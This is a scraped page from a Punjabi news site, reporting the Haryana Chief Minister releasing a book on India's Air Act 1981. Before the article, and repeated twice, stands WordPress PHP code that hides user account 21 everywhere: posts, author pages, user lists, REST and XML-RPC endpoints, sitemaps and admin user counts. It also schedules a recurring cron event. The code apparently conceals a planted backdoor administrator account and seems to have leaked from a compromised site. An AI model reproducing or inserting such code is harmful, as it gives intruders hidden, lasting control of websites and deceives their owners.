add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਹਰਿਆਣਾ ਦੇ ਮੁੱਖ ਮੰਤਰੀ ਮਨੋਹਰ ਲਾਲ ਨੇ ਹਵਾ ਪ੍ਰਦੂਸ਼ਣ ਨੂੰ ਰੋਕਣ ਤੇ ਕੰਟਰੋਲ ਕਰਨਦੇ ਉਦੇਸ਼ ਨਾਲ ਰਚਿਤ ਦ ਏਅਰ, ਐਕਟ 1981 ਕਿਤਾਬ ਦੀ ਘੁੰਡ ਚੁਕਾਈ ਕੀਤੀ - Press Ki Taquat
No Result
View All Result
ਚੰਡੀਗੜ, 07 ਫਰਵਰੀ (ਵਰਸ਼ਾ ਵਰਮਾ) – ਅੱਜ ਇੱਥੇ ਹਰਿਆਣਾ ਨਿਵਾਸ ਵਿਚ ਹਰਿਆਣਾ ਦੇ ਮੁੱਖ ਮੰਤਰੀ ਮਨੋਹਰ ਲਾਲ ਨੇ ਹਵਾ ਪ੍ਰਦੂਸ਼ਣ ਨੂੰ ਰੋਕਣ ਤੇ ਕੰਟਰੋਲ ਕਰਨਦੇ ਉਦੇਸ਼ ਨਾਲ ਰਚਿਤ ਦ ਏਅਰ, ਐਕਟ 1981 ਕਿਤਾਬ ਦੀ ਘੁੰਡ ਚੁਕਾਈ ਕੀਤੀ| ਹਰਿਆਣਾ ਰਿਅਲ ਏਸਟੇਟ ਰੇਗੂਲੇਟਰੀ ਅਥਾਰਿਟੀ ਗੁਰੂਗ੍ਰਾਮ ਦੇ ਚੇਅਰਮੈਨ ਡਾ. ਕੇ.ਕੇ. ਖੰਡੇਲਵਾਲ ਤੇ ਨਗਰ ਅਤੇ ਆਯੋਜਨਾ ਵਿਭਾਗ ਦੇ ਪ੍ਰਧਾਨ ਸਕੱਤਰ ਅਪੂਰਵ ਕੁਮਾਰ ਸਿੰਘ ਵੱਲੋ ਲਿਖਿਤ ਇਸ ਕਿਤਾਬ ਦੀ ਘੁੰਡ ਚੁਕਾਈ ਸਮਾਰੋਹ ਵਿਚ ਹਰਿਆਣਾ ਦੇ ਐਡਵੋਕੇਟ ਜਨਰਲ ਬਲਦੇਵ ਰਾਜ ਮਾਹਜਨ ਦੀ ਮੌਜੂਦਗੀ ਰਹੀ| ਇੰਨਾਂ ਤੋਂ ਇਲਾਵਾ, ਹਰਿਆਣਾ ਦੇ ਪੁਰਾਤੱਤਵ ਅਤੇ ਅਜਾਇਬ ਘਰ ਰਾਜ ਮੰਤਰੀ ਅਨੂਪ ਧਾਨਕ, ਹਰਿਆਣਾ ਦੀ ਮੁੱਖ ਸਕੱਤਰ ਕੇਸ਼ਨੀ ਆਨੰਦ ਅਰੋੜਾ, ਮੁੱਖ ਮੰਤਰੀ ਦੇ ਪ੍ਰਧਾਨ ਸਕੱਤਰ ਰਾਜੇਸ਼ ਖੁੱਲਰ, ਮਾਲ ਕਮਿਸ਼ਨਰ ਧਨਪਤ ਸਿੰਘ, ਹਰਿਆਣਾ ਕਲਾ ਅਤੇ ਸਭਿਆਚਾਰਕ ਵਿਭਾਗ ਦੀ ਵਧੀਕ ਮੁੱਖ ਸਕੱਤਰ ਧੀਰਾ ਖੰਡੇਲਵਾਲ, ਹਰਿਆਣਾ ਰੁਜਗਾਰ ਵਿਭਾਗ ਦੇ ਵਧੀਕ ਮੁੱਖ ਸਕੱਤਰ ਟੀ.ਸੀ.ਗੁਪਤਾ, ਵਿੱਤ ਅਤੇ ਯੋਜਨਾ ਵਿਭਾਗ ਦੇ ਵਧੀਕ ਮੁੱਖ ਸਕੱਤਰ ਟੀ.ਵੀ.ਐਸ.ਐਨ. ਪ੍ਰਸਾਦ, ਮੁੱਖ ਮੰਤਰੀ ਦੇ ਵਧੀਕ ਪ੍ਰਧਾਨ ਸਕੱਤਰ ਵੀ. ਉਮਾਸ਼ੰਕਰ, ਹਰਿਆਣਾ ਰਿਅਲ ਏਸਟੇਟ ਰੈਗੂਲੇਟਰੀ ਅਥਾਰਿਟੀ ਗੁਰੂਗ੍ਰਾਮ ਦੇ ਚੇਅਰਮੈਨ ਡਾ. ਕੇ.ਕੇ. ਖੰਡੇਲਵਾਲ ਤੇ ਨਗਰ ਅਤੇ ਆਯੋਜਨਾ ਵਿਭਾਗ ਦੇ ਪ੍ਰਧਾਨ ਸਕੱਤਰ ਆਪੁਰਵ ਕੁਮਾਰ ਸਿੰਘ ਤੋਂ ਇਲਾਵਾ ਅਨੇਕ ਸੀਨੀਅਰ ਅਧਿਕਾਰੀ ਮੌਜੂਦ ਸਨ|
ਹਰਿਆਣਾ ਦੇ ਮੁੱਖ ਮੰਤਰੀ ਮਨੋਹਰ ਲਾਲ ਨੇ ਦ ਏਅਰ, ਐਕਟ 1981 ਕਿਤਾਬ ਦੀ ਘੁੰਡ ਚੁਕਾਈ ਕਰਨ ਬਾਅਦ ਕਿਹਾ ਕਿ ਸਮੇਂ ਦੇ ਅਨੂਸਾਰ ਮਨੁੱਖ ਦੀ ਜਰੂਰਤਾਂ ਬਦਲ ਜਾਂਦੀਆਂ ਹਲਨ| ਮੌਜੂਦਾ ਸਮੇਂ ਵਿਚ ਉਦਯੋਗਿਕ ਤੇ ਵਾਹਨਾਂ ਦੀ ਬਹੂਲਤਾ ਦੇ ਕਾਰਨ ਪ੍ਰਦੂਸ਼ਣ ਵੱਧ ਰਿਹਾ ਹੈ ਅਤੇ ਮਨੂੱਖ ਦੀ ਸਿਹਤ ਬਿਗੜ ਰਹੀ ਹੈ| ਉਨਾਂ ਨੇ ਕਿਹਾ ਕਿ ਸਮਾਜ ਵਿਚ ਵਿਕਾਸ ਤਾਂ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ ਪਰ ਅਜਿਹੀ ਤਕਨੀਕਾਂ ਅਪਣਾਈ ਜਾਨੀ ਚਾਹੀਦੀਆਂ ਹਨ ਜਿਨਾਂ ਨਾਲ ਪ੍ਰਦੂਸ਼ਣ ਨਾ ਫੈਲੇ|
ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਕਿਤਾਬ ਦਾ ਵਿਸ਼ੇ ਚੋਣ ‘ਤ| ਲੇਖਕਾਂ ਦੀ ਪ੍ਰਸੰਸਾਂ ਕਰ ਵਧਾਈ ਦਿੰਦੇ ਹੋਏ ਕਿਹਾ ਕਿ ਇਸ ਕਿਤਾਬ ਵਿਚ ਪ੍ਰਦੂਸ਼ਣ ਨੂੰ ਰੋਕਣ ਲਈ ਬਣਾਏ ਗਹੇ ਕਾਨੂੰਨ ਅਤੇ ਨਿਯਮ ਦੀ ਵਿਆਖਿਆ ਕੀਤੀ ਗਈ ਹੈ ਜਿਸ ਨਾਲ ਪਾਠਕ ਜਾਗਰੁਕ ਹੋਣਗੇ ਅਤੇ ਊਮੀਦ ਹੈ ਕਿ ਇਸ ਨਾਲ ਸਮਾਜ ਵਿਚ ਪ੍ਰਦੂਸ਼ਣ ਵਿਰੁੱਧ ਜਾਗਰੁਕਤਾ ਵਧੇਗੀ| ਉਨਾਂ ਨੇ ਕਿਹਾ ਕਿ ਰਾਜ ਸਰਕਾਰ ਨੇ ਵੀ ਪ੍ਰਦੂਸ਼ਣ ਨੂੰ ਘੱਟ ਕਰਨ ਲਈ ਕਈ ਯੋਜਨਾਵਾਂ ਸ਼ੁਰੂ ਕੀਤੀਆਂ ਹਨ| ਉਨਾਂ ਨੇ ਦਸਿਆ ਕਿ ਸਕੂਲਾਂ ਵਿਚ ਵਿਦਿਆਰਥੀਆਂ ਰਾਹੀਂ ਦੋ ਸਾਲ ਵਿਚ ਕਰੀਬ 40 ਲੱਖ ਪੌਧੇ ਲਗਵਾਏ ਗਏ ਹਨ, ਅਰਾਵਲੀ ਤੇ ਹੋਰ ਜੰਗਲਾਂ ਦੇ ਕਟਾਵ ਨੂੰ ਰੋਕਨ ਲਈ ਨਿਯਮਾਂ ਵਿਚ ਬਦਲਾਅ ਕੀਤਾ ਗਿਆ ਹੈ| ਉਨਾਂ ਨੇ ਵਾਤਾਵਰਣ ਮਾਹਰਾਂ ਅਤੇ ਬੁੱਧੀਜੀਵੀਆਂ ਨੂੰ ਅਪੀਲ ਕੀਤੀ ਕਿ ਉਹ ਸਵੱਛ ਵਾਤਾਵਰਣ ਬਨਾਉਣ ਲਈ ਲੋਕਾਂ ਨੂੰ ਪ੍ਰੇਰਿਤ ਕਰਨ ਤਾਂ ਜੋ ਭਾਵੀ ਪੀੜੀਆਂ ਸ਼ੁੱਧ ਹਵਾ ਵਿਚ ਸਾਹ ਲੈ ਸਕਣ|
ਕਿਤਾਬ ਦੇ ਲੋਖਕ ਤੇ ਹਰਿਆਣਾ ਨਗਰ ਅਤੇ ਆਯੋਜਨਾ ਵਿਭਾਗ ਦੇ ਪ੍ਰਧਾਨ ਸਕੱਤਰ ਅਪੂਰਵ ਕੁਮਾਰ ਸਿੰਘ ਨੇ ਕਿਤਾਬ ਦੇ ਬਾਰੇ ਵਿਚ ਜਾਣਕਾਰੀ ਦਿੱਤੀ ਅਤੇ ਮਹਿਮਾਨਾਂ ਦਾ ਧੰਨਵਾਦ ਪ੍ਰਗਟਾਇਆ|
Post Views: 260
No Result
View All Result